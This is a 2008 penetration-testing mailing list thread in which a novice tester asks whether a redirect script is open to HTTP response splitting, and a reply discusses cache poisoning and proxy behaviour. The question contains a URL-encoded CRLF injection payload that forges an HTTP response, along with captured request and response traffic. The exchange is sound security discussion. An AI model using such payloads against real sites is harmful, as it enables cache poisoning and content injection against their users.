Penetration Testing mailing list archives
Re: Is there a HTTP Respone Splitting Flaw?
From: "Gleb Paharenko" <gpaharenko () gmail com>
Date: Wed, 30 Apr 2008 10:42:39 +0300
Hi. Service is vulnerable to http splitting in case it does not filter control characters in the output. Spitting can be utilized in several attack vectors and cache poisoning it only one of them. When I've been researching the article of Amit Klein, I was able to easily reproduce cache poisoning with apache, however failed with squid. My advice is to emulate attack in lab environment and then try it in the wild. BTW: fresh squid has some protection patches against cache poisoning. Headers can be normalized by the upstream proxy, so you should be aware of it. You can also cross post you question to more specific webappsec mailing list. 2008/4/29 <bin4ry () theknetgroup org>:
Hi together, i'm new to this community as well as to pen-testing. I'v already done some jobs for smaller companies and it-infrastructures. Now i have to pen-test a website. I need to perform a black-box-test and i've already found some xss- and some sql-injection-bugs which i've reported to the site admin. Now i believe that there's a http response splitting flaw as well. I found this suspicious ressource: foo.bar/accept?dest=/xy/z This looks like a redir-script, right? So this is what i get: GET foo.bar/accept?dest=/xy/z HTTP/1.1 Host: foo.barUser-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Pragma: no-cache Proxy-Connection: keep-alive HTTP/1.x 302 Moved Temporarily <<<<<< look suspicious Via: A_PROXY Connection: close Proxy-Connection: close Date: Fri, 25 Apr 2008 12:09:42 GMT Location: foo.bar/xy/z <<<<<<< Content-Type: text/html; charset=utf-8 Server: Apache/2.0.59 (Unix) mod_ssl/2.0.59 OpenSSL/0.9.8d Cache-Control: no-cache, private X-Runtime: 0.39293 X-Powered-By: Servlet/2.4 JSP/2.0 X-Cache: MISS from prx-deka-02.f.ddk ---------------------------------------------------------- GET /xy/z HTTP/1.1 <<<<< thats it, right? Host: foo.bar User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Proxy-Connection: keep-alive If-None-Match: "e7346ba9885de32fe8d51358b8a409af" HTTP/1.x 304 Not Modified <<<<< comes straight from a squid proxy Via: A_PROXY Date: Fri, 25 Apr 2008 12:09:42 GMT Server: Apache/2.0.59 (Unix) mod_ssl/2.0.59 OpenSSL/0.9.8d Etag: "e7346ba9885de32fe8d51358b8a409af" Cache-Control: private, max-age=0, must-revalidate, private X-Cache: MISS from A_PROXY Till now evrything looks like a response splitting flaw. Thats why i pass this one to $dest: /xy/z/4%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aPragma:%20no-cache%0d%0aLast-Modified:%20Tue,%2015%20Nov%202055%2012:45:26%20GMT%0d%0aContent-Length:%2036%0d%0a%3Chtml%3EHTTP%20Response%20Splitting%3C/html%3E Which is: /xy/z HTTP/1.1 200 OK Content-Type: text/html Pragma: no-cache Last-Modified: Tue, 15 Nov 2055 12:45:26 GMT Content-Length: 36 <html>HTTP Response Splitting</html> So, again our http traffic now with a injected http header: GET /accept?dest=/xy/z/4%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aPragma:%20no-cache%0d%0aLast-Modified:%20Tue,%2015%20Nov%202055%2012:45:26%20GMT%0d%0aContent-Length:%2036%0d%0a%3Chtml%3EHTTP%20Response%20Splitting%3C/html%3E HTTP/1.1 Host: foo.bar User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Pragma: no-cache Proxy-Connection: keep-alive HTTP/1.x 302 Moved Temporarily Via: A_PROXY Connection: close Proxy-Connection: close Date: Fri, 25 Apr 2008 12:07:47 GMT Location: foo.bar/de/xy/z Content-Type: text/html; charset=utf-8 Server: Apache/2.0.59 (Unix) mod_ssl/2.0.59 OpenSSL/0.9.8d Cache-Control: no-cache, private X-Powered-By: Servlet/2.4 JSP/2.0 X-Cache: MISS from A_PROXY ---------------------------------------------------------- GET /xy/z HTTP/1.1 Host: foo.bar User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Proxy-Connection: keep-alive If-None-Match: "78ad90f3569fd7b31ad763f3f52e2c46" HTTP/1.x 304 Not Modified Via: 1.0 A_PROXY Date: Fri, 25 Apr 2008 12:07:48 GMT Server: Apache/2.0.59 (Unix) mod_ssl/2.0.59 OpenSSL/0.9.8d Etag: "78ad90f3569fd7b31ad763f3f52e2c46" Cache-Control: private, max-age=0, must-revalidate, private X-Cache: MISS A_PROXY As u can see, the injected header won't be matched to the http-request from the redir-script. I tried several crlf-types: %0d%0a , %0a%0a and %0a but as we can see this is a linuxbox therefore %0d%0a should work. There's a squid between me and foo.bar. The whitepaper from sanctum sais that squid has a packet boundary approach and messages are read as packets and therefore injected headers may need 2 be padded. Someone can help me out? Thx P.S.: And another question. Since i am not really familiar with response splitting, i'd like to ask you whether the risc of response splitting is always present when a script utilizes user-input to form a new address which is the target of a rediriction script, which manifests in a http 302 header from the server? Thanks and greetings to the community from germany. ------------------------------------------------------------------------ This list is sponsored by: Cenzic Need to secure your web apps NOW? Cenzic finds more, "real" vulnerabilities fast. Click to try it, buy it or download a solution FREE today! http://www.cenzic.com/downloads ------------------------------------------------------------------------
-- Best regards. Gleb Pakharenko. http://gpaharenko.livejournal.com ------------------------------------------------------------------------ This list is sponsored by: Cenzic Need to secure your web apps NOW? Cenzic finds more, "real" vulnerabilities fast. Click to try it, buy it or download a solution FREE today! http://www.cenzic.com/downloads ------------------------------------------------------------------------
Current thread:
- Is there a HTTP Respone Splitting Flaw? bin4ry (Apr 29)
- Re: Is there a HTTP Respone Splitting Flaw? Gleb Paharenko (Apr 30)